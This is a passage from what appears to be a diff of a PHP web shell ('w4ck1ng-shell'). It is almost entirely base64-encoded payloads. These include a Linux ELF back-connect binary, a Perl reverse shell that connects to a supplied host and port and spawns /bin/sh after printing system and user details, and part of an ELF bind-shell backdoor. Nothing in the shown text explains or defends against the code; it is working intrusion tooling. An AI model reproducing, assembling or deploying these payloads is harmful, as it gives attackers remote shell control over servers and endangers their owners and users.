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";
+
+$back_connect_c="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAA2IUECDQAAABMDAAAAAAAADQAIAAHACgAHAAZAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQILAkAACwJAAAFAAAAABAAAAEAAAAsCQAALJkECCyZBAg4AQAAPAEAAAYAAAAAEAAAAgAAAEAJAABAmQQIQJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAABQAAABEAAAAUAAAAAAAAAAAAAAARAAAAEgAAAAcAAAAKAAAACwAAAAgAAAAPAAAAAwAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAABgAAAAAAAAABAAAAAAAAAAkAAAAAAAAADAAAAAAAAAAAAAAADQAAAA4AAAACAAAABAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAAAAAABwBAAASAAAArAAAAAAAAABxAAAAEgAAADwAAAAAAAAACwIAABIAAABIAAAAAAAAAH0AAAASAAAAjAAAAAAAAACsAQAAEgAAAKUAAAAAAAAArwAAABIAAABjAAAAAAAAACcAAAASAAAAkwAAAAAAAADdAAAAEgAAAEMAAAAAAAAAOgAAABIAAABcAAAAAAAAAKoBAAASAAAAVgAAAAAAAAA2AAAAEgAAAHMAAAAAAAAA2QAAABIAAAB4AAAAAAAAACgAAAASAAAAbQAAAAAAAAAOAAAAEgAAAC4AAAAAAAAAeAAAABIAAAB9AAAA8IgECAQAAAARAA4ATwAAAAAAAAA5AAAAEgAAAAEAAAAAAAAAAAAAACAAAAAVAAAAAAAAAAAAAAAgAAAAAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18AbGliYy5zby42AGNvbm5lY3QAZXhlY2wAcGVycm9yAGR1cDIAc3lzdGVtAHNvY2tldABiemVybwBzdHJjYXQAaW5ldF9hZGRyAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABkYWVtb24AX19saWJjX3N0YXJ0X21haW4Ac3RybGVuAGNsb3NlAEdMSUJDXzIuMAAAAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAEAAgAAAAAAAQABACQAAAAQAAAAAAAAABBpaQ0AAAIAsgAAAAAAAAAImgQIBhMAABiaBAgHAQAAHJoECAcCAAAgmgQIBwMAACSaBAgHBAAAKJoECAcFAAAsmgQIBwYAADCaBAgHBwAANJoECAcIAAA4mgQIBwkAADyaBAgHCgAAQJoECAcLAABEmgQIBwwAAEiaBAgHDQAATJoECAcOAABQmgQIBw8AAFSaBAgHEQAAVYnlg+wI6EEBAADolAEAAOjnAwAAycMA/zUQmgQI/yUUmgQIAAAAAP8lGJoECGgAAAAA6eD/////JRyaBAhoCAAAAOnQ/////yUgmgQIaBAAAADpwP////8lJJoECGgYAAAA6bD/////JSiaBAhoIAAAAOmg/////yUsmgQIaCgAAADpkP////8lMJoECGgwAAAA6YD/////JTSaBAhoOAAAAOlw/////yU4mgQIaEAAAADpYP////8lPJoECGhIAAAA6VD/////JUCaBAhoUAAAAOlA/////yVEmgQIaFgAAADpMP////8lSJoECGhgAAAA6SD/////JUyaBAhoaAAAAOkQ/////yVQmgQIaHAAAADpAP////8lVJoECGh4AAAA6fD+//8x7V6J4YPk8FBUUmhoiAQIaBSIBAhRVmiAhgQI6E/////0kJBVieVT6AAAAABbgcMHFAAAUouD/P///4XAdAL/0FhbycOQkJBVieWD7AiAPWSaBAgAdA/rH412AIPABKNgmgQI/9KhYJoECIsQhdJ168YFZJoECAHJw4n2VYnlg+wIoTyZBAiFwHQZuAAAAACFwHQQg+wMaDyZBAj/0IPEEI12AMnDkJBVieVXVlOD7EyD5PC4AAAAAIPAD4PAD8HoBMHgBCnEjX2ovvSIBAj8uQcAAADzpI19r/y5DgAAALAA86qD7AhqAGoB6FD+//+DxBBmx0XIAgCD7AyLRQyDwAj/MOi3/v//g8QQD7fAg+wMUOi4/v//g8QQZolFyoPsDItFDIPABP8w6DH+//+D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EgAAAFwCAAAAAAAAKAAAABIAAABsAgAAZJoECAAAAAAQAPH/cwIAAAyaBAgAAAAAEQAVAIkCAABomgQIAAAAABAA8f+OAgAAAAAAAA4AAAASAAAAnwIAAAAAAAB4AAAAEgAAALICAAAsmQQIAAAAABAC8f/FAgAA8IgECAQAAAARAA4A1AIAAFiaBAgAAAAAEAAWAOECAAAAAAAAOQAAABIAAADzAgAAAAAAAAAAAAAgAAAABwMAACyZBAgAAAAAEALx/x0DAAAAAAAAAAAAACAAAAAAY2FsbF9nbW9uX3N0YXJ0AGNydHN0dWZmLmMAX19DVE9SX0xJU1RfXwBfX0RUT1JfTElTVF9fAF9fSkNSX0xJU1RfXwBwLjAAY29tcGxldGVkLjEAX19kb19nbG9iYWxfZHRvcnNfYXV4AGZyYW1lX2R1bW15AF9fQ1RPUl9FTkRfXwBfX0RUT1JfRU5EX18AX19GUkFNRV9FTkRfXwBfX0pDUl9FTkRfXwBfX2RvX2dsb2JhbF9jdG9yc19hdXgAYmFjay5jAGV4ZWNsQEBHTElCQ18yLjAAX0RZTkFNSUMAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAX19maW5pX2FycmF5X2VuZABfX2Rzb19oYW5kbGUAX19saWJjX2NzdV9maW5pAHN5c3RlbUBAR0xJQkNfMi4wAF9pbml0AGRhZW1vbkBAR0xJQkNfMi4wAF9zdGFydABzdHJsZW5AQEdMSUJDXzIuMABfX2ZpbmlfYXJyYXlfc3RhcnQAX19saWJjX2NzdV9pbml0AGluZXRfYWRkckBAR0xJQkNfMi4wAF9fYnNzX3N0YXJ0AG1haW4AX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfZW5kAGR1cDJAQEdMSUJDXzIuMABzdHJjYXRAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AF9maW5pAF9fcHJlaW5pdF9hcnJheV9lbmQAYnplcm9AQEdMSUJDXzIuMABleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2VuZABodG9uc0BAR0xJQkNfMi4wAGNvbm5lY3RAQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfc3RhcnQAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19wcmVpbml0X2FycmF5X3N0YXJ0AF9fZ21vbl9zdGFydF9fAA==";
+
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiOyc7DQokc3lzdGVtMT0gJ2VjaG8gImBpZGAiOyc7DQokc3lzdGVtMj0gJ2VjaG8gImBwd2RgIjsnOw0KJHN5c3RlbTM9ICdlY2hvICJgd2hvYW1pYEBgaG9zdG5hbWVgOn4gPiI7JzsNCiRzeXN0ZW00PSAnL2Jpbi9zaCc7DQokMD0kY21kOw0KJHRhcmdldD0kQVJHVlswXTsNCiRwb3J0PSRBUkdWWzFdOw0KJGlhZGRyPWluZXRfYXRvbigkdGFyZ2V0KSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHByb3RvPWdldHByb3RvYnluYW1lKCd0Y3AnKTsNCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERPVVQsICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsICI+JlNPQ0tFVCIpOw0KcHJpbnQgIlxuXG46OiB3NGNrMW5nLXNoZWxsIChQcml2YXRlIEJ1aWxkIHYwLjMpIHJldmVyc2Ugc2hlbGwgOjpcblxuIjsNCnByaW50ICJcblN5c3RlbSBJbmZvOiAiOyANCnN5c3RlbSgkc3lzdGVtKTsNCnByaW50ICJcbllvdXIgSUQ6ICI7IA0Kc3lzdGVtKCRzeXN0ZW0xKTsNCnByaW50ICJcbkN1cnJlbnQgRGlyZWN0b3J5OiAiOyANCnN5c3RlbSgkc3lzdGVtMik7DQpwcmludCAiXG4iOw0Kc3lzdGVtKCRzeXN0ZW0zKTsgc3lzdGVtKCRzeXN0ZW00KTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+
+$backdoor="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAoIUECDQAAAD4EgAAAAAAADQAIAAHACgAIgAfAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIrAkAAKwJAAAFAAAAABAAAAEAAACsCQAArJkECKyZBAg0AQAAOAEAAAYAAAAAEAAAAgAAAMAJAADAmQQIwJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAAAAAAABEAAAATAAAAAAAAAAAAAAAQAAAAEQAAAAAAAAAAAAAACQAAAAgAAAAFAAAAAwAAAA0AAAAAAAAAAAAAAA8AAAAKAAAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAABAAAAAAAAAAcAAAALAAAAAAAAAAQAAAAMAAAADgAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC4AAAAAAAAAdQEAABIAAACgAAAAAAAAAHEAAAASAAAANAAAAAAAAADMAAAAEgAAAGoAAAAAAAAAWgAAABIAAABMAAAAAAAAAHgAAAASAAAAYwAAAAAAAAA5AAAAEgAAAFgAAAAAAAAAOQAAABIAAACOAAAAAAAAAOYAAAASAAAAOwAAAAAAAAA6AAAAEgAAAFMAAAAAAAAAOQAAABIAAAB1AAAAAAAAALkAAAASAAAAegAAAAAAAAArAAAAEgAAAEcAAAAAAAAAeAAAABIAAABvAAAAAAAAAA4AAAASAAAAfwAAAEiJBAgEAAAAEQAOAEAAAAAAAAAAOQAAABIAAAABAAAAAAAAAAAAAAAgAAAAFQAAAAAAAAAAAAAAIAAAAABfSnZfUmVnaXN0ZXJDbGFzc2VzAF9fZ21vbl9zdGFydF9fAGxpYmMuc28uNgBleGVjbABwZXJyb3IAZHVwMgBzb2NrZXQAc2VuZABhY2NlcHQAYmluZABzZXRzb2Nrb3B0AGxpc3RlbgBmb3JrAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABfX2xpYmNfc3RhcnRfbWFpbgBjbG9zZQBHTElCQ18yLjAAAAACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAQACAAAAAAAAAAEAAQAkAAAAEAAAAAAAAAAQaWkNAAACAKYAAAAAAAAAiJoECAYSAACYmgQIBwEAAJyaBAgHAgAAoJoECAcDAACkmgQIBwQAAKiaBAgHBQAArJoECAcGAACwmgQIBwcAALSaBAgHCAAAuJoECAcJAAC8mgQIBwoAAMCaBAgHCwAAxJoECAcMAADImgQIBw0AAMyaBAgHDgAA0JoECAcQAABVieWD7AjoMQEAAOiDAQAA6FsEAADJwwD/NZCaBAj/JZSaBAgAAAAA/yWYmgQIaAAAAADp4P////8lnJoECGgIAAAA6dD/////JaCaBAhoEAAAAOnA/////yWkmgQIaBgAAADpsP////8lqJoECGggAAAA6aD/////JayaBAhoKAAAAOmQ/////yWwmgQIaDAAAADpgP////8ltJoECGg4AAAA6XD/////JbiaBAhoQAAAAOlg/////yW8mgQIaEgAAADpUP////8lwJoECGhQAAAA6UD/////JcSaBAhoWAAAAOkw/////yXImgQIaGAAAADpIP////8lzJoECGhoAAAA6RD/////JdCaBAhocAAAAOkA////Me1eieGD5PBQVFJorYgECGhciAQIUVZoQIYECOhf////9JCQVYnlU+gbAAAAgcO/FAAAg+wEi4P8////hcB0Av/Qg8QEW13Dixwkw1WJ5YPsCIA94JoECAB0DOscg8AEo9yaBAj/0qHcmgQIixCF0nXrxgXgmgQIAcnDVYnlg+wIobyZBAiFwHQSuAAAAACFwHQJxwQkvJkECP/QycOQkFWJ5VeD7GSD5PC4AAAAAIPAD4PAD8HoBMHgBCnEx0XkAQAAAMdF+EyJBAjHRCQIAAAAAMdEJAQBAAAAxwQkAgAAAOgJ////iUXwg33wAHkYxwQkjIkECOg0/v//xwQkAQAAAOio/v//ZsdF1AIAx0XYAAAAAItFDIPABIsAiQQk6Jv+//8Pt8CJBCTosP7//2aJRdbHRCQQBAAAAI1F5IlEJAzHRCQIAgAAAMdEJAQBAAAAi0XwiQQk6BL+//+NRdTHRCQIEAAAAIlEJASLRfCJBCToKP7//4XAeRjHBCSTiQQI6Kj9///HBCQBAAAA6Bz+///HRCQECAAAAItF8IkEJOi5/f//hcB5GMcEJJiJBAjoef3//8cEJAEAAADo7f3//8dF6BAAAACNReiNVcSJRCQIiVQkBItF8IkEJOht/f//iUX0g330AHkMxwQkjIkECOg4/f//6EP9//+FwA+EpwAAAItF+Ln/////iUW4uAAAAAD8i3248q6JyPfQg+gBx0QkDAAAAACJRCQIi0X4iUQkBItF9IkEJOiQ/f//x0QkBAAAAACLRfSJBCToPf3//8dEJAQBAAAAi0X0iQQk6Cr9///HRCQEAgAAAItF9IkEJOgX/f//x0QkCAAAAADHRCQEn4kECMcEJJ+JBAjoe/z//4tF8IkEJOiA/P//xwQkAAAAAOgE/f//i0X0iQQk6Gn8///pDv///1WJ5VdWMfZT6H/9//+BwyMSAACD7AzoEfz//42DIP///42TIP///4lF8CnQwfgCOcZzFonX/xSyi0Xwg8YBKfiJ+sH4AjnGcuyDxAxbXl9dw1WJ5YPsGIld9Ogt/f//gcPREQAAiXX4iX38jbMg////jbsg////Kf7B/gLrA/8Ut4PuAYP+/3X16DoAAACLXfSLdfiLffyJ7F3DkFWJ5VOD7AShrJkECIP4/3QSu6yZBAj/0ItD/IPrBIP4/3Xzg8QEW13DkJCQVYnlU+i7/P//gcNfEQAAg+wE6LH8//+DxARbXcMAAAADAAAAAQACADo6IHc0Y2sxbmctc2hlbGwgKFByaXZhdGUgQnVpbGQgdjAuMykgYmluZCBzaGVsbCBiYWNrZG9vciA6OiAKCgBzb2NrZXQAYmluZABsaXN0ZW4AL2Jpbi9zaAAAAAAAAP////8AAAAA/////wAAAAAAAAAAAQAAACQAAAAMAAAAiIQECA0AAAAkiQQIBAAAAEiBBAgFAAAAEIMECAYAAADggQQICgAAALAAAAALAAAAEAAAABUAAAAAAAAAAwAAAIyaBAgCAAAAeAAAABQAAAARAAAAFwAAABCEBAgRAAAACIQECBIAAAAIAAAAEwAAAAgAAAD+//9v6IME